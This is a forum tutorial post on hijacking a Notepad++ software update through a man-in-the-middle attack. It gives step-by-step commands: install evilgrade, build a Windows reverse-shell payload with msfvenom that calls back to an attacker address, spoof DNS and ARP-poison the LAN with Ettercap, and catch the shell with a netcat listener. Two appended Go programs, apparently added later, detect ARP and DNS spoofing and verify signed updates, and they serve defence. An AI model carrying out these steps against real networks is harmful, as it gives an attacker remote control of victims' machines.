MitM Attacks: Hijacking Software Updates with evilgrade

Tommy Angelo

New member
25 Apr 2020

In this tutorial, we will examine what happens when an update or upgrade is hijacked by a malicious entity. All of our systems periodically download upgrades and updates, trusting that they come from the software developer. What if they did not? What if those updates/upgrades were coming from a malicious source?

Two of the most infamous cyber warfare attacks thus far relied upon this weakness in our systems. The infamous Stuxnet worm used the driver signing certificates of Realtek and JMicron to install drivers directly into the kernel, unbeknownst to the user. As these were legitimate signatures, the system accepted them without question. In another example, the NSA was able to use Microsoft security updates to install malicious software on their enemy's systems by generating a hash collision against the Microsoft digital signature, thereby enabling them to install malicious software. Both are examples of the weakness of the digital certificate method of signing updates/upgrades, even under the best of circumstances.

In this tutorial, we will be using a piece of software known as evilgrade to hijack the upgrades/updates of a number of different software packages. Note that isr-evilgrade, as presently developed, is limited to a small number of software updates and upgrades.

One final note: this is a moderate to advanced hack. It requires significant system knowledge, hacking knowledge and patience. We will be using several hacking tools in tandem, including netcat, Metasploit, Ettercap and evilgrade.


Step 1: Open a Terminal and start evilgrade

isr-evilgrade was built into some of the earlier versions of Kali, but it is NOT included in some of the most recent versions. If your version does not include evilgrade, it is in the Kali repository, so you can download and install it by entering:

Code:
kali > apt-get install isr-evilgrade

Once it has finished downloading and installing, simply enter:

Code:
kali > evilgrade



As you can see, evilgrade starts by loading all of its 63 modules. Each module represents a software application whose updates/upgrades evilgrade can hijack. To see all the modules, type:

Code:
evilgrade > show modules



In this lesson, we will be hijacking the update to Notepad++, so we need to configure evilgrade to use that module.

Code:
evilgrade > configure notepadplus

Once we have loaded this module, let's take a look at the options for this module.

Code:
evilgrade(notepadplus) > show options



Please note the VirtualHost line. We will be using that in our DNS setup to hijack the update.


Step 2: Generate a Payload in Metasploit

In this case, we will simply be creating a payload (in Metasploit terms, a malicious program that we place on the victim to give us control) and installing it in place of the update. If you are unfamiliar with Metasploit, check out my Metasploit Basics series here at Hackers-Arise.

The msfvenom command below puts that payload into a Windows .exe file named notepadplus_update.exe. First, we need to create a directory to hold the file. Open a terminal and type:

Code:
kali > mkdir /root/evilgrade

Then type:

Code:
kali > msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.118 LPORT=6996 -f exe > /root/evilgrade/notepadplus_update.exe

Now that we have created the payload, we need to tell evilgrade where it is and to use it as the agent in this update.

Code:
evilgrade(notepadplus) > set agent /root/evilgrade/notepadplus_update.exe



Next, we start the server:

Code:
evilgrade(notepadplus) > start


Step 3: Download and Install Notepad++

Now, let's download and install Notepad++.



When it has finished downloading and installing, it opens a screen like the one below.




Step 4: Setting Up our MiTM

Now that we have evilgrade all set up, we need to set up our MiTM attack. We will be using Ettercap for this purpose.

We will be using Ettercap to redirect DNS queries. The first step is to open Ettercap's etter.dns file with the text editor of your choice; I will be using Leafpad here.

Code:
kali > leafpad /etc/ettercap/etter.dns



In this text file, add the following line. Remember, this is the address of the VirtualHost that evilgrade gave us previously.

Code:
notepad-plus.sourceforge.net A 192.168.1.106

Now, let's start Ettercap in graphical mode.

Code:
kali > ettercap -G

To get Ettercap started, click Sniff --> Unified Sniffing.



The next step is to activate the dns_spoof plugin in Ettercap. Click Plugins --> Manage Plugins --> dns_spoof.

Next, scan for hosts. Click Hosts --> Scan for hosts.



When Ettercap is done scanning for hosts, click Hosts --> Hosts list. This will open a window like the one below. You may have more or fewer hosts, with different IP addresses.



Now we place ourselves between the router (192.168.1.103), selecting it as Target 1, and the victim (192.168.1.118), selecting it as Target 2. Your IP addresses may be different.

Next, we need to ARP poison to place ourselves in the middle. Click Mitm --> ARP poisoning.



Select "Sniff Remote connections".



Next, click Start --> Start Sniffing.
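From the defender's side, the two spoofing steps above leave observable traces: an IP whose MAC changes in ARP replies, and a public update host that suddenly resolves to a LAN address. The Go program below is an added example, not part of the original post nor code from the Ettercap or evilgrade projects; it runs both checks over constructed ARP replies and DNS answers that model the LAN in this tutorial (the trusted-resolver answers in the 203.0.113.x and 198.51.100.x documentation ranges are assumed placeholders).

```go
package main

import (
	"fmt"
	"net"
)

// ArpReply is one observed ARP reply. SampleReplies is constructed data
// modelling the tutorial's LAN, not a real capture.
type ArpReply struct{ IP, MAC string }

var SampleReplies = []ArpReply{
	{"192.168.1.103", "aa:aa:aa:aa:aa:01"}, // gateway
	{"192.168.1.118", "bb:bb:bb:bb:bb:02"}, // workstation
	{"192.168.1.106", "cc:cc:cc:cc:cc:03"}, // third host
	{"192.168.1.103", "cc:cc:cc:cc:cc:03"}, // gateway IP now answered by the third host's MAC
	{"192.168.1.118", "cc:cc:cc:cc:cc:03"}, // workstation IP too: both ends of the path poisoned
}

// DetectArpSpoof reports each reply whose MAC differs from the first MAC seen
// for that IP (the baseline a DHCP lease log or static ARP table would give).
func DetectArpSpoof(replies []ArpReply) []string {
	baseline := map[string]string{}
	var alerts []string
	for _, r := range replies {
		first, seen := baseline[r.IP]
		if !seen {
			baseline[r.IP] = r.MAC
		} else if first != r.MAC {
			alerts = append(alerts, fmt.Sprintf("ip-mac-conflict %s %s", r.IP, r.MAC))
		}
	}
	return alerts
}

// DNSAnswerSuspicious flags an answer for a public update host that is a private
// address (what the etter.dns line above yields) or that shares no address with
// a trusted resolver's answer; the latter deserves a look, CDN variation aside.
func DNSAnswerSuspicious(answer, trusted []string) bool {
	agree := false
	for _, a := range answer {
		if ip := net.ParseIP(a); ip == nil || ip.IsPrivate() {
			return true
		}
		for _, t := range trusted {
			agree = agree || a == t
		}
	}
	return !agree
}

func main() { fmt.Println(DetectArpSpoof(SampleReplies)) }
```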




Step 5: Set Up a Netcat Listener

Now that we have placed ourselves between the victim and the router, all of their traffic will be going through our system. Our next step is to set up a netcat listener on our attack system. This opens a listener on a specific port to receive a connection from the victim machine. Remember that the payload we created used our IP address and port 6996; the listener must use that same port number.

Code:
kali > nc -l -p 6996



Now, when the user opens Notepad++, they will be greeted with a prompt like the one below asking whether they want to download the update.



When the user clicks "Yes", Notepad++ updates from our server and installs our agent in place of the update. The payload we created then connects back to our netcat listener, opening a shell on the victim's system!

Although this attack is limited to software whose developers do not use digital certificates to authenticate updates, it should give you insight into one more way a system can be compromised. As I stated above, this exact attack has been used by nation states with stolen certificates and with hash collisions against legitimate digital certificates.
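The defence the last paragraph points at is an update mechanism that authenticates what it downloads rather than trusting whichever host answered the DNS query. The Go program below is an added example, not Notepad++'s or evilgrade's code: the vendor signs the update's digest with an Ed25519 key, and the client verifies the manifest and then the file against the vendor's public key before executing anything, so a file swapped in by a spoofed host is rejected. Keys and file contents are throwaway values constructed inline.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is published beside an update: the file's SHA-256 and an Ed25519 signature
// over that digest. The public key ships inside the application, not on the download path.
type Manifest struct {
	SHA256    string
	Signature []byte
}

// PublishUpdate is the vendor-side step (a throwaway key is used here).
func PublishUpdate(priv ed25519.PrivateKey, update []byte) Manifest {
	sum := sha256.Sum256(update)
	return Manifest{SHA256: hex.EncodeToString(sum[:]), Signature: ed25519.Sign(priv, sum[:])}
}

// VerifyUpdate is the client-side check to run before executing anything
// downloaded: authenticate the manifest first, then match the file to it.
func VerifyUpdate(pub ed25519.PublicKey, m Manifest, downloaded []byte) error {
	digest, err := hex.DecodeString(m.SHA256)
	if err != nil || !ed25519.Verify(pub, digest, m.Signature) {
		return errors.New("manifest not signed by the vendor key")
	}
	if sum := sha256.Sum256(downloaded); hex.EncodeToString(sum[:]) != m.SHA256 {
		return errors.New("downloaded file does not match the signed digest")
	}
	return nil
}

// Demo replays the page's scenario: the genuine update verifies, the agent swapped in
// by a spoofed host fails, and so does a manifest re-signed with an untrusted key.
func Demo() (genuineOK, swappedRejected, resignedRejected bool) {
	vendorPub, vendorPriv, _ := ed25519.GenerateKey(nil)
	_, attackerPriv, _ := ed25519.GenerateKey(nil)
	genuine := []byte("constructed: real Notepad++ installer bytes")
	agent := []byte("constructed: attacker-supplied notepadplus_update.exe")
	m := PublishUpdate(vendorPriv, genuine)
	genuineOK = VerifyUpdate(vendorPub, m, genuine) == nil
	swappedRejected = VerifyUpdate(vendorPub, m, agent) != nil
	resignedRejected = VerifyUpdate(vendorPub, PublishUpdate(attackerPriv, agent), agent) != nil
	return
}

func main() { fmt.Println(Demo()) }
```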
